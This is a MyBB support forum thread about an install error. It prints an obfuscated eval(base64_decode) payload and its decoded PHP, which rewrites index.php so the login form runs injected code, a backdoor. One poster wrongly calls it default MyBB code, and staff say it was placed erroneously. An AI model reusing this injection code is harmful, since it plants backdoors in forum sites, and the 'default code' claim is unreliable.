MyBB Community Forums

Full Version: Catchable Fatal Error (4096)???
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
(2011-10-03, 09:29 PM)Malcolm. Wrote: [ -> ]Erm, no you don't. Did you bother to decode it?
Did I? Wink

decode result:
@eval(base64_decode("JHRjbXA9QGZpbGVwZXJtcyhNWUJCX1JPT1QuJ2luZGV4LnBocCcpOyBAY2htb2QoTVlCQl9ST09ULidpbmRleC5waHAnLCAwNzc3KTsgJHRlbXA9QGZpbGVfZ2V0X2NvbnRlbnRzKE1ZQkJfUk9PVC4naW5kZXgucGhwJyk7ICR0YW1wPUBmb3BlbihNWUJCX1JPT1QuJ2luZGV4LnBocCcsICd3Jyk7IEBmd3JpdGUoJHRhbXAsIEBzdHJfcmVwbGFjZSgnZXZhbCgiXCRsb2dpbmZvcm0gPSBcIiIuJHRlbXBsYXRlcy0+Z2V0KCJpbmRleF9sb2dpbmZvcm0iKS4iXCI7Iik7JywgJ2V2YWwoIlwkbG9naW5mb3JtID0gXCIiLiR0ZW1wbGF0ZXMtPmdldCgiaW5kZXhfbG9naW5mb3JtIikuIlwiOyIuQCRjb2xbMjNdKTsnLCBAJHRlbXApKTsgQGZjbG9zZSgkdGFtcCk7IEBjaG1vZChNWUJCX1JPT1QuJ2luZGV4LnBocCcsIEAkdGNtcCk7IHJldHVybiB0cnVlOw=="))

and now decode again - result:
$tcmp=@fileperms(MYBB_ROOT.'index.php'); @chmod(MYBB_ROOT.'index.php', 0777); $temp=@file_get_contents(MYBB_ROOT.'index.php'); $tamp=@fopen(MYBB_ROOT.'index.php', 'w'); @fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp)); @fclose($tamp); @chmod(MYBB_ROOT.'index.php', @$tcmp); return true;

Ok, after some research, it seems it is MyBB default code. It appears to setup the collapsible items.

No idea why it's doing it like that. I'm sure it could be done a better way.
ok totally wiped out my FTP and did a clean upload, still getting hte same error. www.techgalaxyminecraft.com is the website
Just hang on for a bit, I'm checking on this with the devs.
thanks G33K
Just remove this line to continue installing.
Thanks How do I remove the line? Do I just open it with something like note++?
Yes, notepad++ should be fine...
This code was certainly placed there erroneously, but we are still trying to work out it's origins.
Thanks for the help that error is now fixxed however I am getting this one now
Warning [2] assert() [function.assert]: Assertion failed - Line: 339 - File: install/resources/language.lang.php PHP 5.3.6 (Linux)
File Line Function
[PHP] errorHandler->error
/install/resources/language.lang.php 339 assert
/inc/class_language.php 137 require_once
/install/index.php 76 MyLanguage->load
Pages: 1 2 3